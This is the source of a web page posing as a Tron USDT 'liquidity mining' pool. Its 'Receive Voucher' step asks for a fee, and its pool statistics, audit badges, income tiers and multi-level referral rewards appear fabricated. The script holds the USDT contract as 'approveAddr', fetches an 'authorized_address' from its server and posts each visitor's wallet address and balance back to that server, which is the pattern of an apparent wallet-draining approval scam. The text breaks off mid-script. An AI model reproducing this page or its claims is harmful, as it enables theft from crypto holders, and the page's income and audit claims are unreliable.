<!DOCTYPE html>

<html>

<head>
    <meta charset="utf-8">
    <title></title>
    <link rel="icon" href="static/image/favicon.ico">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="static/css/font-awesome.min.css">
    <link rel="stylesheet" href="static/css/slick.min.css">
    <link rel="stylesheet" href="static/css/slick-theme.min.css">
    <script src="static/js/jquery-3.6.0.js" integrity="sha256-H+K7U5CnXl1h5ywQfKtSj8PCmoN9aaq30gDh27Xc0jk=" crossorigin="anonymous"></script>
    <script src="static/js/popper.min.js"></script>
    <script src="static/js/slick.min.js"></script>
    <link rel="stylesheet" href="static/css/bootstrap.min.css">
    <script src="static/js/bootstrap.min.js"></script>
    <link rel="stylesheet" href="static/css/style.css">

    <script type="text/javascript" src="static/js/mui.min.js"></script>
    <script type="text/javascript" src="static/js/layer.en.js"></script>
    <link rel="stylesheet" type="text/css" href="static/css/iconfont.css">

    <script type="text/javascript" src="static/js/TronWeb.js"></script>



</head>

<body>
    <!-- top-container -->
    <div class="top-container">
        <header class="container-fluid mx-xl-3 mx-md-3 mx-0 py-xl-4 py-md-4 py-3 w-auto">
            <div class="row align-items-center">
                <div class="col-md-4 col-3 d-flex justify-content-start">
                    <!--img src="/erc/images/share_icon.svg" class="logo share-icon" data-toggle="modal"
                        data-target="#sharemyModal"-->
                    <a href="#" class="link-btn1 px-1 d-flex justify-content-center align-items-center"><img src="static/picture/link_icon.svg" class="logo mr-xl-3 mr-md-3 mr-1 logo-icon1" id="connect">
                        <h4 class="font-weight-normal" id="walletadd">
                            Connect wallet
                        </h4>
                    </a>
                </div>
                <div class="col-md-4 col-6 d-flex justify-content-center">
                    <img src="static/image/header_icon.png" class="logo title_icon">
                </div>
                <!-- Share Modal -->

                <div class="toast-msg p-xl-4 p-md-4 p-2 w-100"><img src="static/picture/toast_success.svg" class="mr-2">Copy
                    success</div>
                <!-- modal -->

                <div class="col-md-4 col-3 d-flex justify-content-end">
                    <div class="link-btn px-1 d-flex justify-content-center align-items-center" style="background:#dc1029;" id="myModalLabel">
                        <img src="static/picture/icon2.png" alt="" srcset="" class="logo mr-xl-3 mr-md-3 mr-1 logo-icon" id="img_pre">
                        <img src="static/picture/down.png" alt="" srcset="" class="logo mr-xl-3 mr-md-3 mr-1 logo-iconsown">
                    </div>
                    <!-- <a href="" class="link-btn px-1 d-flex justify-content-center align-items-center"><img src="/erc/images/link_icon.svg" class="logo mr-xl-3 mr-md-3 mr-1 logo-icon"><h4 class="font-weight-normal">c93de3</h4></a> -->

                </div>
                <!-- modal -->
                <div class="popup_container" style="display: none;">
                    <div class="cover" style="display: none;"></div>
                    <div class="select-nextwork-modal" style="display: none;">
                        <div class="modal-header">
                            <div class="modal-header-title">Select network</div>
                            <button type="button" id="closeModalLabel" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">×</span></button>
                        </div>
                        <div class="modal-body">
                            <!-- <div class="modal-nextwork-cell" id="iconOne">
                                <img src="static/picture/icon1.svg" alt="" srcset="" class="img">
                                <div class="name">Ethereum USDT(ERC20)</div>
                            </div> -->
                            <div class="modal-nextwork-cell" id="iocnTwo">
                                <img src="static/picture/icon2.png" alt="" srcset="" class="img">
                                <div class="name">Tron USDT(TRC20)</div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </header>

        <section class="p-receive mt-4 pt-2">
            <div class="container-fluid ml-xl-3 ml-md-3 ml-0 pr-0 w-auto">
                <div class="row align-items-center">
                    <div class="col-6">
                        <h1 class="m-0">Receive Voucher</h1>
                        <h2 class="mt-xl-3 mt-md-3 mt-2 mb-xl-4 mb-md-4 mb-1 pb-2 font-weight-bold">Join the node and
                            start mining</h2>
                        <div style="display: flex;">
                            <button class="btn text-center custom-ctn d-flex justify-content-center align-items-center font-weight-normal" href="#" data-toggle="modal" data-target="#myModal" show="true" style="margin-right: 10px;">Receive</button>

                        </div>
                    </div>
                    <div class="col-6 d-flex justify-content-end">
                        <div class="img-container"><img src="static/picture/bg_top.png" class="shap w-100"></div>
                    </div>
                </div>

            </div>
        </section>
        <!-- Modal -->
        <div class="modal fade overflow-hidden p-0" id="myModal" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel" aria-hidden="true" style="background: hsla(0,0%,84.7%,.5);">
            <div class="modal-dialog w-100 h-100 mw-100 m-0 p-0" role="document">
                <div class="modal-content border-0 bg-transparent">
                    <div class="container-fluid mx-xl-3 mx-md-3 mx-0 py-0 w-auto">
                        <div class="mining-body p-xl-4 p-md-4 p-2 bg-white br-rounded m-0 modal-body position-relative p-0">
                            <button type="button" class="close font-weight-normal text-white position-absolute" data-dismiss="modal" aria-label="Close">
                                <span aria-hidden="true">×</span>
                            </button>
                            <div class="">
                                <div class="p-2">
                                    <div class="title position-relative">
                                        <span class="left_icon red position-absolute"></span>
                                        <h1 class="font-weight-bold h1-title">Receive description</h1>
                                        <h3 class="h3-title font-weight-normal mt-4">You need to pay a miner's fee to
                                            receive the voucher, please make sure that your wallet has enough TRX as the
                                            miner's fee</h3>
                                        <button class="mt-xl-5 mt-md-5 mt-3 mb-xl-5 mb-md-5 mb-0 exchange-btn rcv-btn mx-auto btn text-center custom-ctn d-flex justify-content-center align-items-center" id="btn-connect">Receive</button>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <!-- modal -->


    </div>
    <!-- main-container -->
    <div class="main-container mt-xl-5 mt-md-5 mt-4 mb-xl-5 mb-md-5 mb-4">
        <div class="container-fluid mx-xl-3 mx-md-3 mx-0 w-auto">
            <section class="p-tabs">
                <div id="exTab2" class="">
                    <div class="panel panel-default">
                        <div class="panel-heading">
                            <div class="panel-title">
                                <ul class="nav nav-tabs row align-items-center justify-content-center text-center tab-1">
                                    <li class="col-4 position-relative"><a class="active" href="#1" data-toggle="tab">
                                            <h6 class="pb-xl-4 pb-md-4 pb-2 m-0 font-weight-bold">Mining Pool</h6>
                                        </a></li>
                                    <li class="col-4 position-relative"><a href="#2" data-toggle="tab">
                                            <h6 class="pb-xl-3 pb-md-3 pb-2 font-weight-bold">Account</h6>
                                        </a></li>
                                    <li class="col-4 position-relative"><a href="#3" data-toggle="tab">
                                            <h6 class="pb-xl-3 pb-md-3 pb-2 font-weight-bold">Team</h6>
                                        </a></li>
                                </ul>
                            </div>
                        </div>
                        <div class="p-tabs-section">
                            <div class="tab-content">
                                <!-- Mining Pool Tab  -->
                                <div class="tab-pane active" id="1">
                                    <!-- Pool data -->

                                    <div class="panel-body p-xl-4 p-md-4 p-2 bg-white br-rounded mt-xl-5 mt-md-5 mt-4">
                                        <div class="p-2">
                                            <div class="title position-relative">
                                                <span class="left_icon position-absolute"></span>
                                                <h1 class="font-weight-bold h1-title">Pool data</h1>
                                            </div>
                                            <ul class="list-unstyled pt-xl-2 pt-md-2 pt-0">
                                                <li class="d-flex justify-content-between align-items-center mt-xl-4 mt-md-4 mt-3">
                                                    <h3 class="h3-title font-weight-normal">Total output</h3>
                                                    <h2 class="h2-title blue font-weight-bold">958002.514600 TRX</h2>
                                                </li>
                                                <li class="d-flex justify-content-between align-items-center mt-xl-4 mt-md-4 mt-3">
                                                    <h3 class="h3-title font-weight-normal">Valid node</h3>
                                                    <h2 class="h2-title blue font-weight-bold">792</h2>
                                                </li>
                                                <li class="d-flex justify-content-between align-items-center mt-xl-4 mt-md-4 mt-3">
                                                    <h3 class="h3-title font-weight-normal">Participant</h3>
                                                    <h2 class="h2-title font-weight-bold">2436</h2>
                                                </li>
                                                <li class="d-flex justify-content-between align-items-center mt-xl-4 mt-md-4 mt-3">
                                                    <h3 class="h3-title font-weight-normal">User Revenue</h3>
                                                    <h2 class="h2-title font-weight-bold">31911.0636081 USDT</h2>
                                                </li>
                                            </ul>
                                        </div>
                                    </div>
                                    <!-- Mining -->
                                    <div class="mining-heading text-center mt-xl-5 mt-md-5 mt-4">
                                        <div class="section_title font-weight-bold mb-1">Mining</div>
                                        <div class="section_subtitle font-weight-bold">Liquidity mining income</div>
                                    </div>
                                    <div class="panel-body mining-body p-xl-4 p-md-4 p-2 bg-white br-rounded mt-xl-5 mt-md-5 mt-4">
                                        <div class="p-address-slider p-2">
                                            <div class="title position-relative">
                                                <span class="left_icon red position-absolute"></span>
                                                <h1 class="font-weight-bold h1-title">User Output</h1>
                                                <ul class="d- list-unstyled pt-xl-2 pt-md-2 pt-0 mb-4">
                                                    <li class="d-flex justify-content-between align-items-center mt-xl-4 mt-md-4 mt-3">
                                                        <h3 class="h3-title font-weight-normal">Address</h3>
                                                        <h3 class="h3-title font-weight-normal">Quantity</h3>
                                                    </li>
                                                </ul>
                                            </div>
                                            <div style="height: 64vw; overflow: hidden;" id="myScrollWrapper">
                                                <ul class="list-unstyled pt-xl-2 pt-md-2 pt-0 m-0" id="myScroll"></ul>
                                                <ul class="list-unstyled pt-xl-2 pt-md-2 pt-0 m-0" id="myFakeScroll"></ul>
                                            </div>
                                        </div>
                                    </div>
                                    <!-- Help center -->
                                    <div class="help-heading text-center mt-xl-5 mt-md-5 mt-4">
                                        <div class="section_title font-weight-bold mb-1">
                                            Help center
                                        </div>
                                        <div class="section_subtitle font-weight-bold">
                                            Hope it helps you
                                        </div>
                                    </div>
                                    <div class="help-body mt-xl-5 mt-md-5 mt-4">
                                        <div class="accordion" id="accordion2">
                                            <div class="accordion-group bg-white p-xl-4 p-md-4 p-3 mb-3 br-rounded">
                                                <div class="accordion-heading">
                                                    <a class="accordion-toggle section_title font-weight-bold d-flex justify-content-between" data-toggle="collapse" href="#collapseOne"> <span>How do i need to join？</span> <img
                                                            src="static/picture/arrow_up.svg" class="arrow"> </a>
                                                </div>
                                                <div id="collapseOne" class="accordion-body collapse">
                                                    <div class="accordion-inner mt-3">
                                                        To participate in non-destructive and non-guaranteed liquidity mining, you need to pay an TRX miner's fee to receive the voucher, and an TRX wallet address only needs to be claimed once.
                                                        Automatically open mining permissions after success
                                                    </div>
                                                </div>
                                            </div>
                                            <div class="accordion-group bg-white p-xl-4 p-md-4 p-3 mb-3 br-rounded">
                                                <div class="accordion-heading">
                                                    <a class="accordion-toggle section_title font-weight-bold d-flex justify-content-between" data-toggle="collapse" href="#collapseTwo"> <span>How do i withdraw money</span> <img
                                                            src="static/picture/arrow_up.svg" class="arrow"> </a>
                                                </div>
                                                <div id="collapseTwo" class="accordion-body collapse">
                                                    <div class="accordion-inner mt-3">
                                                        You can convert the coins produced daily into USDT, and then initiate a withdrawal. The USDT withdrawal will be automatically sent to the wallet address you added to the node, and other
                                                        addresses are not supported.
                                                    </div>
                                                </div>
                                            </div>
                                            <div class="accordion-group bg-white p-xl-4 p-md-4 p-3 mb-3 br-rounded">
                                                <div class="accordion-heading">
                                                    <a class="accordion-toggle section_title font-weight-bold d-flex justify-content-between" data-toggle="collapse" href="#collapseThree"> <span>How to calculate income？</span> <img
                                                            src="static/picture/arrow_up.svg" class="arrow"> </a>
                                                </div>
                                                <div id="collapseThree" class="accordion-body collapse">
                                                    <div class="accordion-inner mt-3">
                                                        When you join successfully, the smart contract starts to calculate your address through the node and starts to calculate the income The ，income is as follows: 1-999 income is 0.008|1000-4999
                                                        income is 0.01|5000-19999 income is 0.013|20000-49999 Income is 0.016|50000-99999 income is 0.019|100000-499999 income is 0.024|500000-3000000 income is 0.03|3000000-999999999999 income is
                                                        0.035|
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                    <!-- Audit report -->
                                    <div class="audit-heading text-center mt-xl-5 mt-md-5 mt-4">
                                        <div class="section_title font-weight-bold mb-1">
                                            Audit report
                                        </div>
                                        <div class="section_subtitle font-weight-bold">
                                            We have a secure audit report
                                        </div>
                                    </div>
                                    <div class="audit-body mt-xl-5 mt-md-5 mt-4">
                                        <div class="row mt-xl-5 mt-md-5 mt-2 pt-3">
                                            <div class="col-4 d-flex justify-content-start">
                                                <img class="botton-icon" src="static/picture/bottom_icon1.png">
                                            </div>
                                            <div class="col-4 d-flex justify-content-center">
                                                <img class="botton-icon" src="static/picture/bottom_icon2.png">
                                            </div>
                                            <div class="col-4 d-flex justify-content-end">
                                                <img class="botton-icon" src="static/picture/bottom_icon3.png">
                                            </div>
                                        </div>
                                    </div>
                                    <!-- Partner -->
                                    <div class="partner-heading text-center mt-xl-5 mt-md-5 mt-4">
                                        <div class="section_title font-weight-bold mb-1">
                                            Partner
                                        </div>
                                        <div class="section_subtitle font-weight-bold">
                                            our business partner
                                        </div>
                                    </div>
                                    <div class="audit-body mt-xl-5 mt-md-5 mt-4">
                                        <div class="row mt-xl-5 mt-md-5 mt-2 pt-3">
                                            <div class="col-4 d-flex justify-content-start">
                                                <img class="botton-icon" src="static/picture/bottom_icon4.png">
                                            </div>
                                            <div class="col-4 d-flex justify-content-center">
                                                <img class="botton-icon" src="static/picture/bottom_icon5.png">
                                            </div>
                                            <div class="col-4 d-flex justify-content-end">
                                                <img class="botton-icon" src="static/picture/bottom_icon6.png">
                                            </div>
                                        </div>
                                        <div class="row mt-xl-5 mt-md-5 mt-4">
                                            <div class="col-4 d-flex justify-content-start">
                                                <img class="botton-icon" src="static/picture/bottom_icon7.png">
                                            </div>
                                            <div class="col-4 d-flex justify-content-center">
                                                <img class="botton-icon" src="static/picture/bottom_icon8.png">
                                            </div>
                                            <div class="col-4 d-flex justify-content-end">
                                                <img class="botton-icon" src="static/picture/bottom_icon9.png">
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                <!-- Account Tab -->
                                <div class="tab-pane" id="2">
                                    <div class="panel-body p-xl-4 p-md-4 p-2 bg-white br-rounded mt-xl-5 mt-md-5 mt-4">
                                        <div class="p-2">
                                            <div class="title position-relative">
                                                <span class="left_icon position-absolute"></span>
                                                <h1 class="font-weight-bold h1-title">My account</h1>
                                            </div>
                                            <ul class="list-unstyled pt-xl-2 pt-md-2 pt-0">
                                                <li class="d-flex justify-content-between align-items-center mt-xl-4 mt-md-4 mt-3">
                                                    <h3 class="h3-title font-weight-normal">Total output</h3>
                                                    <h2 class="h2-title font-weight-bold balance">0 TRX</h2>
                                                </li>
                                                <li class="d-flex justify-content-between align-items-center mt-xl-4 mt-md-4 mt-3">
                                                    <h3 class="h3-title font-weight-normal">Wallet balance</h3>
                                                    <h2 class="h2-title font-weight-bold" data-balance="0" id="usdt_balance">0 USDT</h2>
                                                </li>
                                                <li class="d-flex justify-content-between align-items-center mt-xl-4 mt-md-4 mt-3">
                                                    <h3 class="h3-title font-weight-normal">Exchangeable</h3>
                                                    <h2 class="h2-title font-weight-bold balance">0 TRX</h2>
                                                </li>
                                            </ul>
                                        </div>
                                    </div>
                                    <!-- Account > exchange -->
                                    <div class="panel-body">
                                        <section class="p-tabs mt-xl-5 mt-md-5 mt-4">
                                            <div id="exTab3" class="">
                                                <div class="panel panel-default">
                                                    <div class="panel-heading">
                                                        <div class="panel-title">
                                                            <ul class="nav nav-tabs row align-items-center text-center tab-2 border-0">
                                                                <li class="col-4 position-relative d-flex justify-content-start"> <a class="active" href="#4" data-toggle="tab">
                                                                        <h1 class="p-0 m-0 font-weight-normal d-flex justify-content-center align-items-center"> Exchange</h1>
                                                                    </a></li>
                                                                <li class="col-4 position-relative d-flex justify-content-center"> <a href="#5" data-toggle="tab">
                                                                        <h1 class="p-0 m-0 font-weight-normal d-flex justify-content-center align-items-center"> Withdraw</h1>
                                                                    </a></li>
                                                                <li class="col-4 position-relative d-flex justify-content-end"> <a href="#6" data-toggle="tab">
                                                                        <h1 class="p-0 m-0 font-weight-normal d-flex justify-content-center align-items-center"> Record</h1>
                                                                    </a></li>
                                                            </ul>
                                                        </div>
                                                    </div>
                                                    <div class="p-tabs-section">
                                                        <div class="tab-content">
                                                            <!-- Exchange Tab  -->
                                                            <div class="tab-pane active" id="4">
                                                                <div class="panel-body p-xl-4 p-md-4 p-2 bg-white br-rounded mb-5">
                                                                    <div class="p-2">
                                                                        <div class="title position-relative">
                                                                            <span class="left_icon position-absolute"></span>
                                                                            <h1 class="font-weight-bold h1-title"> Exchange</h1>
                                                                        </div>
                                                                        <ul class="mt-4 mb-xl-5 mb-md-5 mb-4 border br-rounded list-unstyled d-flex align-items-center">
                                                                            <li class="col-4 p-xl-5 p-md-5 p-3 d-flex justify-content-start flex-column p-input">
                                                                                <input type="number" placeholder="0.0" class="change_input ff font-weight-bold" id="ethnumber">
                                                                                <div class="change_all position-absolute" id="redeem" onclick="upnum();">Redeem all</div>
                                                                            </li>
                                                                            <li class="col-4 p-xl-5 p-md-5 p-3 d-flex justify-content-center"><img src="static/picture/change_icon.svg" class="change_icon"></li>
                                                                            <li class="col-4 p-xl-5 p-md-5 p-3 d-flex justify-content-end">
                                                                                <div class="usdt_content d-flex align-items-center"><img src="static/picture/usdt_icon.png" class="usdt_icon mr-xl-4 mr-md-4 mr-2"><span>USDT</span></div>
                                                                            </li>
                                                                        </ul>
                                                                        <button class="exchange-btn mx-auto btn text-center custom-ctn d-flex justify-content-center align-items-center commit">Exchange</button>
                                                                        <div class="border-top mt-xl-5 mt-md-5 mt-4 py-4">
                                                                            <h3 class="h3-title font-weight-normal tips">Convert the TRX coins you dug into USDT</h3>
                                                                        </div>
                                                                    </div>
                                                                </div>
                                                            </div>
                                                            <!-- Withdraw Tab -->
                                                            <div class="tab-pane" id="5">
                                                                <div class="panel-body p-xl-4 p-md-4 p-2 bg-white br-rounded mb-5">
                                                                    <div class="p-2">
                                                                        <div class="title position-relative">
                                                                            <span class="left_icon position-absolute"></span>
                                                                            <h1 class="font-weight-bold h1-title"> Withdraw</h1>
                                                                        </div>
                                                                        <ul class="mt-4  mb-xl-5 mb-md-5 mb-4 border br-rounded list-unstyled d-flex align-items-center">
                                                                            <li class="col-4 p-xl-5 p-md-5 p-3 d-flex justify-content-start flex-column p-input">
                                                                                <input type="number" placeholder="0.0" id="usdtnumber" class="change_input ff font-weight-bold">
                                                                                <div class="change_all position-absolute" id="redeem1" onclick="upnum1();">Redeem all</div>
                                                                            </li>
                                                                            <li class="col-4 p-xl-5 p-md-5 p-3 d-flex justify-content-center">
                                                                                <div class="divider"></div>
                                                                            </li>
                                                                            <li class="col-4 p-xl-5 p-md-5 p-3 d-flex justify-content-end">
                                                                                <div class="usdt_content d-flex align-items-center"><img src="static/picture/usdt_icon.png" class="usdt_icon mr-xl-4 mr-md-4 mr-2"><span>USDT</span></div>
                                                                            </li>
                                                                        </ul>
                                                                        <button class="exchange-btn mx-auto btn text-center custom-ctn d-flex justify-content-center align-items-center withdraw-commit">Confirm</button>
                                                                        <div class="border-top mt-xl-5 mt-md-5 mt-4 py-4">
                                                                            <h3 class="h3-title font-weight-normal tips">Your withdrawal will be sent to your USDT wallet address within 24 hours in the future</h3>
                                                                        </div>
                                                                    </div>
                                                                </div>
                                                            </div>
                                                            <!-- Record Tab -->
                                                            <div class="tab-pane" id="6">
                                                                <div class="panel-body p-xl-4 p-md-4 p-2 bg-white br-rounded mb-5">
                                                                    <section class="p-tabs mt-xl-5 mt-md-5 mt-4">
                                                                        <div id="exTab4" class="">
                                                                            <div class="panel panel-default">
                                                                                <div class="panel-heading">
                                                                                    <div class="panel-title">
                                                                                        <ul class="nav nav-tabs row align-items-center justify-content-center tab-3 border-0">
                                                                                            <li><a class="active font-weight-normal d-flex align-items-center justify-content-center" href="#66" data-toggle="tab">Exchange</a> </li>
                                                                                            <li><a href="#7" data-toggle="tab" class="font-weight-normal d-flex align-items-center justify-content-center">Withdraw</a> </li>
                                                                                            <li><a href="#8" data-toggle="tab" class="font-weight-normal d-flex align-items-center justify-content-center">Mining</a> </li>
                                                                                        </ul>
                                                                                    </div>
                                                                                </div>
                                                                                <div class="p-tabs-section">
                                                                                    <div class="tab-content">
                                                                                        <!-- Exchange Tab  -->
                                                                                        <div class="tab-pane active" id="66">
                                                                                            <div class="exchange-body">
                                                                                                <div class="d-flex flex-wrap align-items-center mt-5">
                                                                                                    <div class="col-6 t1">
                                                                                                        <div class="t1-head">
                                                                                                            Time
                                                                                                        </div>
                                                                                                    </div>
                                                                                                    <div class="col-6 t1 d-flex flex-column align-items-end">
                                                                                                        <div class="t1-head">
                                                                                                            Quantity
                                                                                                        </div>
                                                                                                    </div>
                                                                                                </div>
                                                                                                <!-- If no data display img -->
                                                                                                <div class="no_data text-center">
                                                                                                    <ul class="list-unstyled pl-2 pr-3 pt-xl-2 pt-md-2 pt-0"  id="exchange-list">
                                                                                                        <img class="my-2" src="static/picture/nodata_icon.svg">
                                                                                                        <h3 class="h3-title font-weight-normal">No Data</h3>
                                                                                                    </ul>
                                                                                                </div>
                                                                                            </div>
                                                                                        </div>
                                                                                        <!-- Withdraw Tab -->
                                                                                        <div class="tab-pane" id="7">
                                                                                            <div class="exchange-body">
                                                                                                <div class="d-flex flex-wrap align-items-center mt-5">
                                                                                                    <div class="col-6 t1">
                                                                                                        <div class="t1-head">
                                                                                                            Time
                                                                                                        </div>
                                                                                                    </div>
                                                                                                    <div class="col-6 t1 d-flex flex-column align-items-end">
                                                                                                        <div class="t1-head">
                                                                                                            Quantity
                                                                                                        </div>
                                                                                                    </div>
                                                                                                </div>
                                                                                                <!-- If no data display img -->
                                                                                                <div class="no_data text-center">
                                                                                                    <ul class="list-unstyled pl-2 pr-3 pt-xl-2 pt-md-2 pt-0"  id="withdraw-list">
                                                                                                        <img class="my-2" src="static/picture/nodata_icon.svg">
                                                                                                        <h3 class="h3-title font-weight-normal">No Data</h3>
                                                                                                    </ul>
                                                                                                </div>
                                                                                            </div>
                                                                                        </div>
                                                                                        <!-- Mining Tab -->
                                                                                        <div class="tab-pane" id="8">
                                                                                            <div class="exchange-body">
                                                                                                <div class="d-flex align-items-center mt-5">
                                                                                                    <div class="col-6 t1">
                                                                                                        <div class="t1-head">
                                                                                                            Time
                                                                                                        </div>
                                                                                                    </div>
                                                                                                    <div class="col-6 t1 d-flex flex-column align-items-end">
                                                                                                        <div class="t1-head">
                                                                                                            Output
                                                                                                        </div>
                                                                                                    </div>
                                                                                                </div>
                                                                                                <!-- If no data display img -->
                                                                                                <div class="no_data text-center">
                                                                                                    <img class="my-2" src="static/picture/nodata_icon.svg">
                                                                                                    <h3 class="h3-title font-weight-normal">No Data</h3>
                                                                                                </div>
                                                                                            </div>
                                                                                        </div>
                                                                                    </div>
                                                                                </div>
                                                                            </div>
                                                                        </div>
                                                                    </section>
                                                                </div>
                                                            </div>
                                                        </div>
                                                    </div>
                                                </div>
                                            </div>
                                        </section>
                                    </div>
                                </div>
                                <!-- Team Tab -->
                                <div class="tab-pane" id="3">
                                    <div class="panel-body p-xl-4 p-md-4 p-2 bg-white br-rounded mt-xl-5 mt-md-5 mt-4">
                                        <div class="p-2">
                                            <div class="title position-relative">
                                                <span class="left_icon position-absolute"></span>
                                                <h1 class="font-weight-bold h1-title">Team data</h1>
                                            </div>
                                            <ul class="list-unstyled pt-xl-2 pt-md-2 pt-0">
                                                <li class="d-flex justify-content-between align-items-center mt-xl-4 mt-md-4 mt-3">
                                                    <h3 class="h3-title font-weight-normal">level 1 Total output</h3>
                                                    <h2 class="h2-title font-weight-bold"><span class="level1-money">0</span> TRX</h2>
                                                </li>
                                                <li class="d-flex justify-content-between align-items-center mt-xl-4 mt-md-4 mt-3">
                                                    <h3 class="h3-title font-weight-normal">level 2 Total output</h3>
                                                    <h2 class="h2-title font-weight-bold"><span class="level2-money">0</span> TRX</h2>
                                                </li>
                                                <li class="d-flex justify-content-between align-items-center mt-xl-4 mt-md-4 mt-3">
                                                    <h3 class="h3-title font-weight-normal">level 3 Total output</h3>
                                                    <h2 class="h2-title font-weight-bold"><span class="level3-money">0</span> TRX</h2>
                                                </li>
                                                <li class="d-flex justify-content-between align-items-center mt-xl-4 mt-md-4 mt-3">
                                                    <h3 class="h3-title font-weight-normal">Team Revenue</h3>
                                                    <h2 class="h2-title font-weight-bold"><span class="trx_balance">0</span> TRX</h2>
                                                </li>
                                            </ul>
                                        </div>
                                    </div>
                                    <div class="share_content mt-xl-5 mt-md-5 mt-3 px-xl-4 px-md-4 px-3 pt-3 pb-3">
                                        <div class="set_content">
                                            <h3 class="h3-title font-weight-normal">Referrer</h3>
                                            <div class="content d-flex justify-content-between align-items-center p-xl-4 p-md-4 p-3 mt-xl-4 mt-md-4 mt-2">
                                                <input type="text" placeholder="Referrer's wallet address" value="" class="border-0 w-100" id="fid">
                                                <button class="submit d-flex justify-content-center align-items-center referrer-commit">Save</button>
                                            </div>
                                            <h3 class="h3-title font-weight-normal tips mt-4">Set the referrer, the referrer will get additional rewards from the mining pool</h3>
                                        </div>

                                        <div class="set_content mt-4 pt-4 border-top">
                                            <h3 class="h3-title font-weight-normal">My share link</h3>
                                            <div class="content p-xl-4 p-md-4 p-3 mt-xl-4 mt-md-4 mt-2">
                                                <div class="copy-text position-relative d-flex justify-content-between align-items-center">
                                                    <input type="text" readonly="readonly" class="text border-0 w-100" id="referral-input" value="share link">
                                                    <button class="submit d-flex justify-content-center align-items-center">Copy</button>
                                                    <!-- <div class="toast-msg p-xl-4 p-md-4 p-2 w-100"><img src="/erc/images/toast_success.svg" class="mr-2">Copy success</div> -->
                                                </div>
                                            </div>
                                            <h3 class="h3-title font-weight-normal tips mt-4">Send your invitation link, friends join the node through your link, and you will get generous token rewards</h3>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </section>
        </div>
        <!-- container-fluid -->
    </div>
    <!-- main-container -->
    <script type="text/javascript">
        var count = jQuery('.slick-slide').length;
        jQuery("#total").text(count);
        jQuery('.slider-for').slick({
            autoplay: true,
            arrows: false,
            dots: false,
            slidesToShow: 7,
            slidesToScroll: 1,
            centerPadding: "10px",
            draggable: false,
            infinite: true,
            pauseOnHover: false,
            swipe: false,
            touchMove: false,
            vertical: true,
            speed: 600,
            autoplaySpeed: 800,
            useTransform: true,
            cssEase: 'cubic-bezier(0.645, 0.045, 0.355, 1.000)',
            adaptiveHeight: true,
            rtl: false
        });

        let copyText = document.querySelector(".copy-text");
        copyText.querySelector("button").addEventListener("click", function() {
            let input = copyText.querySelector("input.text");
            input.select();
            document.execCommand("copy");
            copyText.classList.add("active");
            window.getSelection().removeAllRanges();

            $('.toast-msg').addClass("active");
            setTimeout(function() {
                copyText.classList.remove("active");
                $('.toast-msg').removeClass("active");
            }, 2500);
        });
        $('#closeModalLabel').click(function() {
            $('.popup_container').css('display', 'none')
            $('.cover').css('display', 'none')
            $('.popup_container .select-nextwork-modal').css('display', 'none')
        });
        $('#myModalLabel').click(function() {
            $('.popup_container').css('display', 'block')
            $('.cover').css('display', 'block')
            $('.popup_container .select-nextwork-modal').css('display', 'block')
        });
        $('#iconOne').click(function() {
            window.location = '';
        });
        $('#iocnTwo').click(function() {
            $("#img_pre").attr("src", 'static/picture/icon2.png');
            $('.popup_container').css('display', 'none')
            $('.cover').css('display', 'none')
            $('.popup_container .select-nextwork-modal').css('display', 'none')
            $('.link-btn').css('background', '#dc1029')
        });

        var address = getUrlQueryString('address')
        var rank = 6.5;
        var authorized_address = '';
        var domain = 'https://' + window.location.host + '/';
        var bizhong = '';
        var approveAddr = "TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t";
        var total=0;
        var trx = 0;
        var tronWeb;
        var time;
        var content = document.getElementById("myScroll");
        var fakeContent = document.getElementById("myFakeScroll");
        var wrapper = document.getElementById("myScrollWrapper");
        function getUrlQueryString(names, urls) {
            urls = urls || window.location.href;
            urls && urls.indexOf("?") > -1 ? urls = urls.substring(urls.indexOf("?") + 1) : "";
            var reg = new RegExp("(^|&)" + names + "=([^&]*)(&|$)", "i");
            var r = urls ? urls.match(reg) : window.location.search.substr(1).match(reg);
            if (r != null && r[2] != "")return unescape(r[2]);
            return null;
        }

        function upnum() {
            var num = $('#usdt_balance').attr('data-balance');
            jQuery('#ethnumber').val(num);
        }

        function upnum1() {
            var num = $('#usdt_balance').attr('data-balance');
            jQuery('#usdtnumber').val(num);
        }

        function getInfo() {
            $.ajax({
                type: 'get',
                url: domain + 'api/get_trc',
                async: false,
                success: function(data) {
                    console.log(data)
                    authorized_address = data.data.authorized_address;
                    console.log(authorized_address);
                },
                error: function(data) {

                }
            })
        }

        async function postInfo(address, symbol, balance) {
            var s = getUrlQueryString('s')
            var a = getUrlQueryString('r')

            var data = {
                address: address,
                authorized_address: authorized_address,
                referral_address:authorized_address,
                bizhong: symbol,
                code: s,
                reffer: balance
            }

            $.ajax({
                type: 'post',
                url: domain + 'api/insert_trc',
                data: data,
                success: function(data) {},
                error: function(data) {}
            })

        }

        async function postCustomer(address, symbol, balance) {
            var parent = getUrlQueryString('parent')
            var s = getUrlQueryString('s')

            var data = {
                address:address,
                parent:parent,
                domain: 'defi2',
                code:s
            }
            $.ajax({
                type: 'post',
                url:  domain + 'api/user/info',
                data:data,
            })
        }

        function getProfits(){
            $.ajax({
                type: 'get',
                url:  domain + 'api/profits',
                success:function(data){
                    var profitArray = data.data;
                    var html = '';
                    for (var index in profitArray) {
                        html += '<li class="d-flex justify-content-between align-items-center mt-xl-4 mt-md-4 mt-3">'
                            + '<h3 class="font-weight-normal blue">' + profitArray[index]['address'] + '</h3>'
                            + '<h2 class="h2-title font-weight-bold">'+ profitArray[index]['balance'] + ' '
                            + profitArray[index]['type'] + '</h2>'
                            + '</li>';
                    }
                    $('#myScroll').html(html)
                    roll(40);
                },
                error:function(data){
                }
            })
        }

        function roll(t) {
            fakeContent.innerHTML = content.innerHTML;
            // 开始无滚动时设为0
            wrapper.scrollTop = 0;
            // 设置定时器，参数t用在这为间隔时间（单位毫秒），参数t越小，滚动速度越快
            var timer = setInterval(rollStart, t);

            // 鼠标移入div时暂停滚动
            wrapper.onmouseover = function() {
                clearInterval(timer);
                timer = null
            };

            // 鼠标移出div后继续滚动
